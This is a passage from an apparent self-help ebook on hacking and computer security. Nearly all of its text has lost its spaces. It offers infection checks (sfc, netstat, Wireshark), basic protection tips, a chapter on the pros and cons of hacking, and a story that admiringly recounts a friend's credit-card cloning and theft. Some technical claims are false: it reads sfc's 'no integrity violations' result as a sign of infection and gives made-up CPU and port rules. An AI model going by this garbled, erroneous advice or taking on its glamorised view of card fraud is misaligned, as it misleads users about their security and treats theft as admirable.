themdonotevencareaboutthisaspectbecausetheyarenotgivingtheirdevices

attentionandtheyreallydonotcareaboutthemonlyiftheycanhitthem,which

isverypossibletohappenbecausemostofthemputimportantandpersonalstuff

ontheirmachinesuchasbusinessdocuments,personalphotos,personalvideos

andsensitivedataingeneralwhichtheywanttokeepprivatebutoncetheyare

hackedallthosedatacanbesharedwiththepublic.

Rememberthateverythingcouldgethacked;thisisthemainreasonwhywe

shouldinvestinqualitysoftwareandpayaspecialkindofattentiontoallofour

devices,ifanythingisgoingstrangewithyourdeviceevenifitisaprinter,

computer,phoneortabletpleasetaketherightattitudeandifyoudonotknow

howtodothestepsfromabove,takeyourdevicetotheclosestcenterthatoffers

supporttodeviceswhichworkelectronically,itisbettertopayasumofmoney

thanlosingeverything.

Themethodpresentedwillnottakeyoutoolongtosaveyourcomputer’slife

but,intheend,everypersonisfreetobuildtheirlifeastheywantbychoosing

whattheywant.Donotletothercontrolyourlifebycontrollingyourcomputer,

evenifthehackedcomputerworksprettygoodyoushouldtoyourbestinorder

toloseconnectionwithyourhacker.

Somehackersuseprofessionalandsophisticatedsystemsandiftheywantto

infectsomething,inmostofthecasestheywillmakethehacklooklikeitisa

partofyoursystem.Sophisticatedsystemsallowhackersusethebestmalware

thatembedsitselfinthehackedsystemandthehackedsystemwillnotbeableto

detectitoreventoremoveit.

Ifhackersgetmoreprofessional,youmustdoitandthisbookisgoingtopresent

anothermethod,alittlebitmorecomplicatedthatwillhelpyoutoknowifyou

arehackedornot,andifyouaregivingyouasolutionisamusttodo.Hackers

whoprefersophisticatedmethodstohackwanttocreateabotnetwhichisa

networkofcompromisedmachinesmanagedbythem;abotnetcanhaveonlya

commandcenter.Togetridofthiskindofhacks,kindlyfollowthenextsteps:

Makesureyouhaveagoodqualityanti-virus,anti-malwaresoftwarewhichcan

detectallkindsofvirusesandmalwarelikeTrojans,worms,keyloggersand

rootkits,becausetherearecomingupeverydaynewversionsofmalwareand

theymightnotberecognized,buttrytogetthelatestversionsofanti-virusand

anti-malwarebecauseitisbetter.So,runyouranti-virussoftwareandstartdoing

activesessionsofscanning.

Next,seewhatisgoingonwithyourTaskManager,itisthefirstthingyouhave tocheckifyouaresuspiciousaboutbeinghacked.Insteadoftheclassicmethod (TypingTaskManagerinthesearchlineofyourStartbutton) toopenit,you cantrysomethingfasterwithyourkeyboardbybeatingCtrl+Alt+Delatonce andselectingTaskManagerattheendofthemenuthatshowsup.Afteryou openTaskManagerselectbyclickingtheoption“Processes”andawindowis supposedtoshowup,checkyourCPUUsageatthebottomofthewindowandif theCPUistoohighsomethingisgoingonyourmachinewithoutyour permission.

Ingeneral,oncleananduninfectedmachinesCPUUsageisunder10%.

Movetothenextstepinordertocontinuetheprocessandcheckyoursystem’s integrityinWindowsbecauseonceyouknowthatthereissomethingonyour system you should try to identify it as well. Microsoft has built a system integritycheckerintoWindowsknownassfc.exewhichmustbeabletotestthe integrity of the files in your system and it helps you a lot in scanning for corruptions.

sfc/scannow/andthesystemwillwelcomeyouwithsomethinglike:

MicrosoftWindows [Version6.1.7601]

Copyright<c>2009MicrosoftCorporation.Allrightsreserved.

C:\Windows\system32>sfc/scannow

Beginningsystemscan.Thisprocesswilltakesometime.

Beginningverificationphaseofsystemscan.

Verification100%complete.

WindowsResourceProtectiondidnotfindanyintegrityviolations.

C:\windows\system32>

Andifitisdisplayingsomethingliketheabovemeansthatthesystemisinfected

withahiddenmalware.

After that, test Network Connections using Netstat because hackers are communicatingwithyourcomputerviainternetconnections,Windowshasan utilitycalledNetstatanditisspeciallydesignedtomakeyouableseeallthe connectionsonthemachine,youwillneedagainacommandpromptsoopenit andusethecommand/Netstat-ano/.

Someofthemaliciousfamilycan’tbedetectedwithNetstatbutyoushouldtryit

becausesomeversionsaredetectableandyouneverknowwhatisunderyour

possession.

Install Wireshark program which can help you in checking the internet connectionswhichisautilitythatidentifieseverythingthatisgettinginandout the computer. It is less possible to be controlled by the malware because comparedtoNetstatthisisnotaWindowstool.Afteryouinstallitopenitand letitspotallthepacketsthataretravelinginandoutyoursystem.

Hackersusehighnumberportswhentheyaremanipulatingsosearchforports between 1500 and 60000. It will appear on one of those ports if you have maliciousstuffinyourcomputer,checkingtrafficthatleaveyoursystemisalso agoodidea.ToseethetrafficfromyoursystemcreateafilterinWireshark by

writingitinthefiltermenu,typethisafterip.src==PUTYOURIPHERE.

Thefiltercreatedisgoingtoshowyoutrafficonlyfromyoursystemandthat’s

whyyourIPisrequested.Writeintoyourfilter’swindowthisip.src==

 

PUT

YOURIPHEREandifthesyntaxisrightitshouldswitchfrompinktogreen.

 

After this please click on Apply button and look for unusual traffic( the maliciousone)andifyoudetectsomethingunusualpleasecontactaspecialistin ordertohelpyouasfastasyoucandoit,maliciousfilesaresohardtofind becausehackersallovertheworldcreatenewversionsalmosteveryhourwhile virusesarenotthateasytomakeandthisisthemainreasonwhymalicious familyhitsmoreoftenthanever,becauseitissodiverse.SystemsasLinuxand OSareevenmorecomplicatedandyouneedtobeamasterinthedomainin ordertodiscoverthattheyareinfectedwithsomethingbutthemainadvantage withthosesystemsisthattheyareimmunetomosttypesofattacks,butnottoall types.

*NOTE:thismethoditselfisachallenge,ifyouchoosethismethodpleasebe

patientandcareful,doeverythingwithamaximumofattentionandcheckyour

trafficlistmorethanoncetomakesureyouwilldetectifthereareanyofthe

maliciousfamilymemberscaptiveinyoursystem.Evenifthismethodisalittle

bitharderthantheotheronepresenteditisveryefficientandworthtotry.

HowtoprotectYourselfFromHacking

Preventionisliterallyalwaysbetterthancure,itisbettertoavoidanunwanted situationandeveryonecandoitwithalittlebitofattentionanditmightrequest an investment, but always remember that cure prices are higher than investments.Whynotkeepyourbodyhealthybymakinganinvestmentinsome vitaminsinsteadofgettingillandpayalotofmoney,physicalandpsychical effort?Youcanavoidalotofthings.Protectingyourcomputerfromalltypesof hackingisveryimportantforyouandforyoursystembutfewarethosewho knowhowtodoitandtheirnumberisdecreasing…

Ahighnumberofattacksmaketheinternettolooklikeitisholdingahorror movie story nowadays due to the big numbers of cyber criminals and their attacks,keepingyourdevicehealthyiscrucialinthebattleagainsthacking.

Parentsareadvisingyoubecausetheywantyoutobehappy,thisbookhasthe

sametask.

vulnerabilitiesandalwayscheckonnewupdatesandinstallthem,don’twaittoo

muchbecausehackersarealwaysready.

Thefirstthingsyoushouldtakeattitudeandprotectyourcomputerfromare

viruses;thereareseveralwaystocategorizevirusesandeachonecomeswithits

ownnames.Therearemacroviruses,worms,backdoorsandTrojansarethebest

knownandexperiencedatthemoment.Thesevirusesmultiplyovertheinternet

andmaliciouswebsitesorothersourcestoinfectthecomputer.Othersspread

thoughdevicesthatareallowingyoutowriteinformationandreadinginsuchas

USBmemorysticksandexternalharddrives.Viruseshavethreemainfunctions:

infect,destroyordamagedataonyourmachinetogetherwithinformationon

externaldrivers.Hackerscanalsouseyourcomputerasahackingmachineby

infectingitwithvirusesbutluckilytherearemanytoolsthathelpyoukeepthe

situationundercontrol.

Anti-virussoftwarehighlyrespectedandappreciatedbyexpertsisAvastwhich

hasaregularsetofupdatesanditiseasytouseduetoitsdesign.

SomeusefultipsbelowtoincreaseyourAV’syield:

SomeusefultipsbelowtoincreaseyourAV’syield: Installonlyasoftware.

Installonlyasoftware.

MakesureyourAVsoftwareupdatesautomatically,thiswilltake

worriesaway.

Ensurethatyoursoftwareacceptsupdates.

Checkyourcomputer’ssituationatleastonceaweek.

Makesurethatthesoftwareisalwaysrunning.

Howtoavoidinfections?

Beverycarefulaboutwhatfilesyouchoosetoopenanddownloadfromthe

internet,itisrecommendedtodeleteimmediatelyfilesfromunknownpeopleor

organizationsafteryoureceivethem.Risksareateverystep,sotakethemin

considerationbeforeyouburnaCDorrunaUSBstickintoyourcomputer.

MakesureagainthatyourAVsoftwareisrunningbeforeyouinsertthem.

Viruscreatorsdonotusuallytargetfreeandopensourcesoftwareandyoucan

avoidsomeinfectionsbyswitchingtothiskindofsoftware.

Spyware is another thing you should be aware of. Spyware is belonging to malicioussoftwarefamilyanditisusedbyhackerstotrackyourworkandto allowthemgettheinformationtheywantfromyou.Thissoftwareiscapableof

recordingyourmousemovements;collectthewordsyouwrite,thepagesyou

enterandtheprogramsthatbelongtoyou.Asaneffectofthepreviousactions,

hackerscanbreakyoursecurityandgainpersonaldataaboutyouandinsome

casesaboutyourcontactsaswell.Machinesbecomeinfectedwithspywarein

thesamewaytheygetinfectedwithviruses.Reviewyourbrowser’ssettingsand

makesuretheyaresecure.

Anti-SpywaretoolsareverywelcomedtoprotectyourcomputerandSpybotis

whatyouneedbecauseitiscapableofidentifyingandremovingknowntypesof

malware.

Preventthistypeofinfectionsbyfollowingthenextsteps:

Readeverythingthatshowsupinyourfacecarefullybeforeclicking

okoryes.

Neveraccepttoruncontentfromunbelievablesources.

Gettingafirewallisalsoimportantbecauseitisthefirstprogramthatknowsthe

incominginformationfromtheinternetandthelastonetocontroloutgoingdata

aswell.Withafirewallyoudonothavetopayattentiontotheincomingand

outgoinginformationisnotimportantanymore.

Ahighqualityfirewallwillaskforyourpermissionforeachprogramonyour

machine.Whenoneofyourprogramsistryingtocontacttheoutsideworldyour

firewallwillalertyouandaskyouifyoutrustit.Inthiswarbetweenhackers

andnonhackerssuchafirewallcouldbeusedasyourfrontofdefense.

Toavoiduntrustednetworkconnectionsyoushould:

Installonyourmachineonlytheprogramsyouneedanddownload

themrightwiththeirlicense.

Donotgiveyourpasswordstoanyone.

Ifyoudonotneedaninternetconnectionpleasedisconnectyour

machine.

Shutdownyourcomputeratnight.

Ensurethatallthecomputerswhichbelongtoyournetworkhavea

firewall.

Getaneasy-to-usefirewall.

Keeping your computer up-to-date is very important for your security, you shouldupdateeverythingonyourcomputerstartingfromyouroperatingsystem andendingwiththeprogramsyouuse.Updatesarerequiredregularlyonevery software.

Also,stayup-to-datewithFOSS(FREEANDOPENSOURCESOFTWARE)

andfreewaretools.Tryoutthemtoanyproprietysoftwareusedbyyou;pay

extraattentiontounlicensedprograms.

These tools are built by experts who belong to non-profit organizations or companieswhichupdatethemfrequentlyfreeofcharge.

NumerousFREEANDOPENSOURCESOFTWARE(FOSS)applicationsmay

besimilartoeachotherandworkinthesamewayonlywithsmalldifferences.

StudiesprovidethatgettingawayfromtheMicrosoftOfficeoperatingsystem

andmovingtoFFOSalternativenamedGNU/Linuxismoresecureanditis

healthierforyourcomputer.Andremember,preventionisbetterthancure!

Thosearenottheonlywaystopreventattacks;lifeisfullofoptionsatevery

pointofitsoprotectionisaswellfullofoptionsateverypoint.

Inordertoincreaseyoursystem’ssecurityyoucanfollowthenextadvicesbut

keepinyourmindthateverythingispossibleandthatthereisnotanyhardware

orsoftwarewhichisimpossibletohack.

Astrongpasswordisoneofthefirststepsyoushouldmakeinfollowingyour road to protection because it helps on securing your information. It is recommendedtorepeatcombinationsofrandomalpha-numericcharacterssuch asnumbers,symbolsandlettersthatwillbemorethanelevencharacters.To reducetherisk,pleaseuseapasswordmanager.Evenifyourpasswordisoneof themostsecuredintheworlddonotforgettopayextraamountofattentionto thewebsitesyouvisit.

Two-FactorAuthenticationisveryimportantandtheyhaveapositiveeffecton

you.Websitesandcompanieswhichrespecttheircustomersandserviceswill

providesuchanoption.Let’stakeasanexampleTwitter,ifyouhaveatwitter

accountandyoutrytologinfromanunknowndevice,aftertypingthepassword

theysendyouamessageonyourphonewithaverificationcodeyoushould

enterinordertoaccessyourtwitteraccount.Suchoptionsalerttheusersexactly

whensomeonetriestogetintotheiraccount.ThisoptionisusedalsobyApple,

Microsoft,GoogleandDropbox.Togetfulladvantageofthisoptionsetupyour

settingscarefully.

Never back up sensitive information on your phone using the internet, just ordinaryactivitiesandnothingmorethanthat.Keepsensitivedocumentsand imagesofallexternalserverswhichmeanyouwillnotallowapplicationslike iCloudorFlickrandotherstoautomaticallyuploadinformationtotheirstorage.

Andtoresolvethisproblemcreateanexternaldrivewhichyouwillonlyaccess

whenyouarenotconnectedtotheinternetandkeepthesensitivedatathere.

Also,youshouldnotlinkaccountsbecausehackerscantakefulladvantageof

thisactionandcompromiseeverythingthatbelongstoyoubyproxy.Nowadays,

itisreallytokeepaccountsfarfromeachotherduetosocialmediawhichhada

strongimpactonsociety.Checkwhichapplicationsyouhavelinkedinthepast

withyoursocialmediaaccountsandremovethemifyouarenotusingthem.

Choosingahard-to-guesssecurityquestionmightsaveyoufrombeingahacking

victimaswell,butinthecenturyofsocialmediawebsiteswhereeverypersonis

sharingeverythingisnotmakingsenseforthem,butforthosewhoarealittlebit

mysteriousandkeeptheirpersonaldetailsawayfrompeoplemightbeasolution.

Evenifyouareextrovertedandyoushareeverythingaboutyou,answeringwith

stupiditymightincreaseyoursecuritylevel.

Don’tforgettoprotectallyourdeviceswithpasswords.Itisamusttodowhen

yougetanewdevicesuchasaphoneortablet,youshouldsecureitwithagood

password.Changingyourpasswordsoftenisalsoanideatotakeinconsideration

duetothedailydiscoveriesofthehackers.Bygivingimportancetoyourdevices

youalsogiveimportancetothecontactsthatare“stuckin”there.

Ifyouhaveadomainnameyoucanchoosetoprivatizeyourwebsitebecause

onceyouhaveadomainnametherearebigchancestoaccessyourdatawithout

effort.Privatizeyourdomainregistrationbygoingtotheusuallyuseddomain

registrationsite,loginandsearchfortheoptionthatallowsyoutoprivatizeyour

dataandifthisoptionseemstobehardtofindorinexistentpleasecontactthe

siteandletthemguideyouthoughtheprocedure.Thisoptionmightrequestfees

butitisdefinitelyworthit.

Clearingyourbrowserdataisalsoanactionyoushouldoftendoandnotonlyon

yourcomputer,onallthedeviceswhichareunderyourpossession.Browsers

keepeverythingaboutyouronlineactivityandcollectrecordsofeverysiteyou

havevisited,datasuchaswhatyoudownloadorsendcanbestockedforweeks

andthehackerstakefulladvantageofthisbystealingyourrecordsofonline

activity.

Trytoavoidpubliccomputersbecausehackersusethemtochallengetheirselves

oftenandyoushouldkeepoutoftheirgame.

Using “hyper-texttransferprotocolsecure.”–HTTPS,itissimilartoHHTTP whichpeopleusetoenterinternetaddresses.HTTPSisgivingyouanextralevel ofsecurityandencryptionwhenyouareusingtheinternet,thedataisalso validatewhichmeansthatHTTPScanshowyouifthewebsiteiseitherfakeor original.

FreeWirelessaccessisniceandhelpful,butchecktwicetheconnectionyou

choosebecausefreeWi-Fiistheeasiestwaytohacksomething,hackerscanget

everythingfromyourdeviceiftheyareconnectedtothesamenetworkasyou

do.

Becarefulwhichconnectionsyouchoose,somehackersspeciallymakeonesfor

theirfuturevictims,ifyoureallyneedfreeWi-Fimorethananythingthenmake

sureyouareconnectingtoaserioussource.

Updatesaregoodtohaveandverywelcomedinyourlifeandonyoursystems, theworldischangingsecondbysecondandthereissomethingnewthatshows up second by second, of course you can not see and take full benefit of everythingthatgoesoninthebothvirtualandrealworldsbutyoucantryatleast tokeepintouchwithinnovationbytryingeverythingnewthatfrontsyou.

Ifupdateswerenotasimportantastheyare,maybethiswouldhaveahuge

impactonindividuals,organizationsandonsocieties.Updatesaretherealproof

whichindicatesthattherearebrightmindsthatthinkforeveryoneandfinda

solutionforeveryproblem.

Byfollowingtheadvicesandmethodsgivenyouwillbeinaprocessofmind

growingwithahighlevelofsecurityguaranteedbythemethodsandadvices.

CHAPTER5:ADVANTAGESAND

DISADVANTAGESOFBEINGAHACKER

Despite that every action has a reaction, every action has advantages and disadvantages.Ifyoudecidetodoanactionyoushouldassumebothsuccessand failureandbothadvantagesanddisadvantages.Thereisnoperfectioninthe worldsoitisimpossibletofindanythingthathasonlyadvantagesorsomething thathasonlydisadvantagesbecauseanythingshouldhaveabalance.

Ifyouareanethicalhackeryoushouldtakefulladvantageofthesituationsyou

areinbecauseyouhavetotailordifferentsolutionsfordifferentproblems,you

cannothaveastandardsetofactionsoyouwillcreateaplanforeveryhackand

yourplanshouldcontainthenextequipment:

1. Givedetailsabouttestingintervals

2. Givedetailsabouttestingprocesses

3. Identifyallthenetworksthatyoushouldtest

4. Gettheplaneapprovedbecauseyouareworkingwithpeople.

Andifyourplanissuccessfulyoushouldbeveryproudofyourselfbecauseyou

willsaveandprotectabignumberofpeopleincludingyourfriends,familyand

ingeneraleveryoneyoulove,youshouldbeproudthatyouaregivingahandin

buildingyourcountry’ssecurity!Anotherbenefitifyouarepassionateabout

hackingandyoureallylovewhattodoisbeingpaidforitandgettingyour

freedomguaranteed.

Also,othercategoriesofpersonstakeadvantagemorethanhackersifwetalked about ethical hacking because ethical hackers are fighting constantly with terrorismandtheattackswhichattempttothenationalsecurity.

Theadvantagesanddisadvantagesproblemhastwobiganswers:ifyousee

hackingadvantagesanddisadvantagesfromthehacker’sangleorifyoulookat

theadvantagesanddisadvantagesfromthepublicoptionangle.Themainideais

thatwhatisanadvantageforahackerisadisadvantageseenfromtheother

angleofthepublicopinionanditworksviceversa.

So,weremainundertheethicalhackingexampleandifanethicalhackerisnot

paidattime,hecouldsendyousomemaliciousfileorhecandoanattack

becauseheisskilledinordertogetmoneyandyouasacompanyororganization

aredisadvantaged.Hackersknowallyoursystem’sflawsandvulnerabilitiesand

theycanuseittodestroyyou.Ontheotherpart,ifeverythinggoesonasitis

supposedto;youwilltakeadvantagefromethicalhackingbecauseyoursystem

willbemoreimmunetoattacks.Anotherdisadvantageforyourcompanyor

organizationisthatthehackerknowsallyourfinancialdataandIdonotthinkit

willendupgoodforyouifyoumakethemmad…

Andifyourhackerismakingamistakeyourcompanyisalwayspayingforhis

mistakebutyouaretheoneswhohavehiredhim.

Andnowlet’smovefromtheparticularexampletoageneralone,hackersare

veryadvantagedbecausetheyhavethechancetotesttheirabilitiesandtheyalso

learnhowtoworkindependentlywhileforacompanythisisadisadvantage

especiallyifitisabigcompany,itcouldturnanytimeintothetestingorhacking

areaifthehackerswantto.

Adisadvantageforyouasahackerisifanyoneelseknowaboutyouractivity

becausebeingifyouarenotinethicalhackingthenyouhavebigchancestoget

afreetriptothejailandmaybeasentence,whilethepeopleyouknowcanplay

onyouhowevertheywantbecausetheyknowaboutyour“hidden”activities,so

asahackerbewareofwhoyouallowtostayaroundyoubecauseyounever

know.

Asahacker,youcanalwaysgetbasedonpeople’smistakesandwiththeir

securityproblems,whileviceversainthiscaseisnotpossibleexceptiftheother

peoplearehackerstoo.

Anotheradvantagehackersgetfromyouisthatviacomputerhackingtheycan controlyourmachineanddowhatevertheywanttowiththemachineorworst than that, Monster Hackers can let your machine become their operating machineandifauthoritieswillfindoutthehackguesswhowillpay?Youwill doitdefiantlybecausethehackismadefromyourmachine.Anotherthing hackerscandoisshuttingoutthesystemsofthevictimsandattacktheirvictim’s systembysendingvirusesandwormstoitwhilenonhackersarenotcapableof doingthisbecausetheyarenotskilled.

Thereisacategoryofhackerswhichisbasedonsocialengineering,guesswho

willhelpthosehackersgettheirgoal?Thevictimwilldoitbyclickingthe

infectedlinks,filesordocumentstheyreceiveviaemail.

Other hack operations like stealing passwords, sensitive data such as email address,moneyorphotoscanbeperformedbyhackersandnonhackershaveno

chancetosucceed.

Atthemainadvantagethatnonhackersgetfromhackersiswearingaformofa lesson because you can learn from hackers that there is no 100% secure technologyandyoucanalsoswitchthesituationinyouradvantagebyusing hackerstohelpyouinproblemsassensitivedatarecoverbuthackersarethe oneswhocanharmyourprivacyatthesametime.

Ifrightnowabattlewouldstartbetweenhackersandnonhackers,thevictoryis

forhackersbecausetheyarealwaysinformedandreadytoactionwiththeir

skills.

As a hacker you are always under mission so you keep your mind active, somethingthatnonhackerscannottakeadvantageof.

So,seeingtheadvantagesanddisadvantagesoftheproblemisahardoperation because there are two sides that are taking advantage of the others side disadvantageandthatishowitworksingeneral,butifyouhavewellbased packageinformationandskillsyoucanturnthesituationinyourfavoranytime. Italldependsonvisionandonhowhackersandnonhackerscanredirectsucha problem.

CHAPTER6:HACKINGTOCHANGETHE

WORLDPOSITIVELY

AnAnonymHackerWhoCouldSavetheWorld(basedonrealcase)

“Thepastisaforeigncountry;theydothingsdifferentlythere.”thatiswhatL.P. Hartleysaidonce,andtakingalittletimetothinkaboutthisquotewasdefinitely oneofthebestdecisionseverbecauseitisreallysurprisinghowyourbraincan make connections with the reality around you, sometimes you feel like everythingisgoingcrazyandyoudonotunderstandanythingjusttakeafew hoursandthinkaboutit,thesolutionalwaysexist.

Thisquotemademerememberaboutanoldchildhoodfriend,wewillcallhim MisterRinthisstory.IhavemetMr.RinaparkinRomania,thishappened

whenwewerebothatageof6,sixteenyearsago.IandMr.Rwereassociatedin

makingsandcastlesofsandinthepark;wewerethemasterstherebecause

everyoneknewwhoweretheauthorsofthecastleswhichwerefillingmorethan

ahalfofthesand’sareainthepark.IwascomingwiththeformsandMr.Rwas

bringingwaterandshovel,thatwasourmixtobuildourfamouscastlesand

thinkingaboutthosetimesmakemefeelliketheyhappenedamillionyearsago

inanotherlife.

Afterbuildingourfamouscastles,wewereoftentemptedabouttheideaof

gettingtogetherandwatchingcartoonssuchasDexter’sLaboratoryatMr.R’s

house,wearestillfascinatedabouteverythingthanmeanstechnology,devices

andmachinesandabouthowdotheywork.Butdestinydidnotwantusto

continuegrowingtogethersoweseparatedbecauseIhadtogotomynative

country.Romaniawasformejustforholidaysandmybeautifulfriendshipwith

Mr.Rwasconsumedinthesummermorethaneverbecauseweweremeeting

onlyinthesummerswhenIwascomingtoRomania.

Timeflewsofastandwebecamealmostteenagers,thebiggesttrendofthattime

wastohaveanemailaddress,andbecauseIandMr.Rlovedtechnologywe

havegotourfirstaddresseswhenwewereintheperiodbetweenpubertyand

adolescence.ThoseemailaddressesweretheonlywaytocommunicatewithMr.

Randasaresultwebothstartedtospenddaysandevenweeksinfrontofthe

calculator.Specialconnectionsexistbetweenpeopleandtheyarejustlikethe

connectionbetweenarouterthatisgivinginternetandacomputerthatitisusing

it,bothofthemknowallthedetailsabouteachother.Thesamewashappening

betweenmeandMr.Rbecauseevenifwedidnottalkfordayswealmostknew

whatiseachoneofusthinkingabout,IknewwhatMr.Rwasthinkingaboutand

Mr.RknewwhatIwasthinkingaboutaswell.Istillrememberhowexcitedwe

werebothofuswhenwewerehearingthatanewprogramisgoingtobe

realizedoraboutanewdevicethatisgoingtobeonsale.Technologykeptour

friendshipactivethroughthetimeandwewereusingtechnologyinordertotalk

aboutit,IwastellingMr.RallthenewsandupdatesIknewaboutthe

technologyandviceversa.

OurfavoriteplaceinthisworldisTechnischesMuseumWien,Austriabecauseit istherightplacetoseetheevolutionofmachinesfromtheoldesttimestothe currenttimes,youcanseefromoldtrainsandelectricitydevicestothelatest

modelsofTeslacars,youcanseefromairplanessuchasDiamondDA42to

Pistonsteamenginesandoneofthebiggesttechnologyrangeintheworld.For

us,thetripwasjustlikeparadisebecausebothofuswerefeelinglikehomein

thatmuseum.

InthattriptoAustria,onourwaytohome,Mr.Rwasbehindapersonthatwas

whisperingtohisfriendabouthowsuccessfulheisinhackingandabouthow

muchmoneyheearnsmonthlydoingit.

Afterwebotharrivedfromourtrip,IwenthomeandMr.Rwentdirectlytothe

librarysayingthatheneedssomethingurgent,Ifeltthatsomethingisnotgoing

onasitshouldbutIdidn’tpaymuchattentionandIregretitnow.

Onhiswaytothelibrary,Mr.Rwaswalkingveryfastbecausethisisaneffect

hegetswhenhehasagoodideaandinamomentofinattentionhehasgotintoa

caraccident.Ihavegottheblacknewsfrommysisterwhowasworkingasa

doctorinthehospitalwhereMr.Rspentalotoftime.

IwenttoseeMr.R’ssituationandwhenIsawhimIfeltveryguiltybecauseI didn’tstophim,butinmyheadwassomethinglike“seriously?WillIkeeplisten toallmyfeelings?Therearemoreimpornatthings”.Morethanthat,Ihadtogo

tomycountry2daysaftertheaccident“abandoning”Mr.Rinthehospitaleven

ifhewasn’taloneatall.Mr.Rstayedincomafor3daysandafterthe3days,he

wokeup.

Iwashome,feelinghorribleaboutthesituationwithMr.RandIdidn’ttalkto

himverymuchuntilwemetagaininthesummer.WhenIsawMr.Rinthe

summer,hisbehaviorhassufferedmodifications;hewasspendingmostofthe

timeathomesayingthatheisstudying.Icalledhimintheparkwehavemetfor

thefirsttimeandIdecidedtotalkopenedtohimaboutallthesituationaboutthe accident and fortunately, our connection was established again because he decidedtodothesame.Dopeopleworklikemachines?!

ItoldMr.RthatIwasfeelingguiltyaboutwhathappenedandaskedhimwhyhe

wenttothelibraryinthatdayanddidn’tpayattentiontothecarsaroundhimand

Mr.Ranswered“IwenttothelibrarybecauseIwantedtogetamanualabout

hacking.IwaswalkingfastandIforgottopayattentiontothecarsbecauseI

wastoodistractedbymyidea,Ifeltlikeextranaturalforceswerecontrollingme

atthatmoment”andourdiscussioncontinueduntiltherainstarted,andbecause

Mr.R’shomewasclosertotheparkthanmine,webothdecidedtogothere.

WhenIarrivedatMr.R’shouseIfeltlikebeinginDexter’sLaboratorybecause thereweredifferentkindsofmachines,onePC,twolaptopsandsomepapers thrownonthefloor.IdidnothavetoaskbecauseMr.Rstartedtotellme everything,hesaidthatinhiscomaperiodhehadavisionabouta“futurelife” andafterhehasgotoffthehospitalheboughtmachinesthatwerecloningcredit cardsandstartedtousethem,hehadalotofCD’sandhetoldmethatheis officiallyastudentattheITUniversityinourtown. Mr.R’shackingoperations weresuccessful,hiscardcreditclonesworkedundetectedandhestartedalsoto makemoneyfromhackingtransferringmoneytohisaccount.Itwasalittlebit SFformetoseehishousetransformedbuthowever….

YearsweregoneandMr.Rhasjustfinishedhisstudiesbutneverworkedlegal usinghisDiploma,heweresayingthatheismakingmoremoneyfromthose operationsandhedoesnothavetoworkanymore.Hebecamefamousinthe townacrossthetimeandhisintelligencewasexploreddaybydayandhewas saying that he has money in accounts all around the world, all made from “business”.

Onedayhedecidedtothrowapartyatoneofhisresidences,becausehebought morehousesafterhehasgotfullofmoneyandlocalauthoritiesknewabouthim andhisabilitiesbuthewastooundetectableandtheydidnothaveanyproof abouthim.So,athispartypeoplefeltgreatbuttheneighborsdidnotfeelgreat becausethepartypeopleweretoonoisyandtheyweretoooldsotheycalledthe police,andthepolicecan’twaitedforsuchamoment!TheyhavegotMr.Rin theprisonforbreakingthepublicdisciplinelawsbutMr.Rwastoosmartfor suchcheapactions,infact,gettinghiminjailwasagamecontrolledbybig powersandinstitutions.Intheprison,Mr.Rhasgotseveralofferstoworkfor NASAand security international organizations and the condition to get his

freedomagainwastoacceptoneofthebigoffers,thatishowhegotoutofthe

jail,byacceptingother’srulestoplaywithpeople’slivesbutbecauseMr.Risa

verycleverperson,ithasaplantoescapefromthemiserablesituationheisin

now.

Mr.R’sabilitiesareconsideredveryhighbecausetheorganizationheworksfor

now(forced)considerhimthemasterpieceinsavingsomesecuritysystems,but

Mr.Rissmartandhewon’ttellhissecretsandideastooeasy.

Itisfunnyhowothershavethepermissiontobreaktherulesmadebythem!Our

worldissuchadefectonebecausethevulnerabilitieshavebeendiscoveredbut

inordertoresolvetheproblem,BigPeopleprefertokeepthemhiddenandtake

fulladvantageofthem.

TheonlywaytosaveourselvesfromthosedirtybiggamespoweredbyBig

peoplewhoaresuperiortoeveryoneofusbytheirinfluenceistoopenoureyes

andashackersinvesttimeinexploitingvulnerabilities,weshoulddothesameas

theydo,weshouldanalyzeflawsinoursystemandmakealltheworldwakeup

atthesametime.Thequestionwithoutansweris:Ifallthepeoplefromthe

worldwouldgenerateabigrevolution,whowillwin?Theoneswhogotthe

powerortheoneswhoarerightandcanprovethetruthbuttheyarecontrolled?!

Itiseasiertorepairacomputersystemthanaworldwidesystem.

CHAPTER7:HACKINGTIPSANDTRICKS

Tipsandtricksaboutanydomaininlifearewelcomedbutaspecialplaceis occupiedbytechnologytipsandtricks,theyhelpyoudoyourworkfasterin somecasesandinothercasesyoudiscoversomenewfeatureswhichyoudidnot evenknowthatexist,andbecauseweloveupdatesandwelovetotryeverything

newwearegoingtostartwithsometipsandtricksaboutWindows8becauseit

isrelativelynewandunfamiliarforthosewhojustinstalledit,soherewego,

tipsandtricksbelow:

•UtilizeandhackthePowerUserMenu

Microsofthasalltherightstotakeorgiveanythingabouttheirprogramsand

systemsandthisiswhatMicrosoftdidhereaswell,hereisnostartmenu.

ButMicrosoftisprofessionalsotheydeliveredahelpfulnewtoolcalledthe PowerUserMenu.So,right-clickinthelowerlefttuskofyourdesktopandit

shouldshowupawrittenmenuwhichallowsyoutoaccess16utilitiesand

betweenthemyouwillfindtoolslikecommandprompt,Runboxandan

administrativecommandprompt.Clickon“ProgramsandFeatures”andby

doingthisyoudelivertoyourControlPanelanappletwhichwillallowyouto

uninstallyourdesktopprograms,takealookatwhatupdatesyouhaveand

switchcertainWindowsfeatureseitheronoroff.MobilityCenterwilltakeyou

toanappletwhichisgoingtoletyouchangeyourscreenorientation,manage

brightnessandalotofothersettings.

Also,somethinginterestingaboutPowerUserMenuisthatyoucanhackit.Itis

allowingyoutoremovefilesyoudonotwantthereandaddtheitemsyouwant

toappearjustlikealistofmostusedprograms,games,etc.

Checkifeverythingworksasitissupposedtoandmakesurethatyoucanaccess

hiddenfilesinFileExplorerandtakeatripto:

C:\Users\<i>username</i>\AppData\Local\Microsoft\Windows\WinX

Andthereusernamewillbeyouraccountname;youshouldfindthreefilesthere.

EveryoneofithasshortcutstoPowerMenuapplications.Thefirstgroup(file

Group1)includestheDesktop;thesecondgrouphasascontenttheControl

PanelandTaskManagerandyouwillalsoFileExplorer,RunandSearch;The

lastgroupincludesthetwocommandprompts,devicemanager,eventviewer

andeverythingthatwasnotincludedintheothertwogroups.

IfyoutakealookandPowerMenuyouwillobservethattherearethreegroups

andthosearethefileswhichbelongtoWinXfolder.

InordertomodifythePowerUserMenu,editthecontentsoffoldersG1,G2and

G3.Ifyouaregoingtoremoveashortcutitwillfadeawayfromthemenuandif

youaddit,itwillappearimmediately.

Tohideashortcutselectitanhityourdeletebuttonandtoaddanewoneopen

thefolderyouwantittobelikeahomeforyourshortcutandright-clickonan

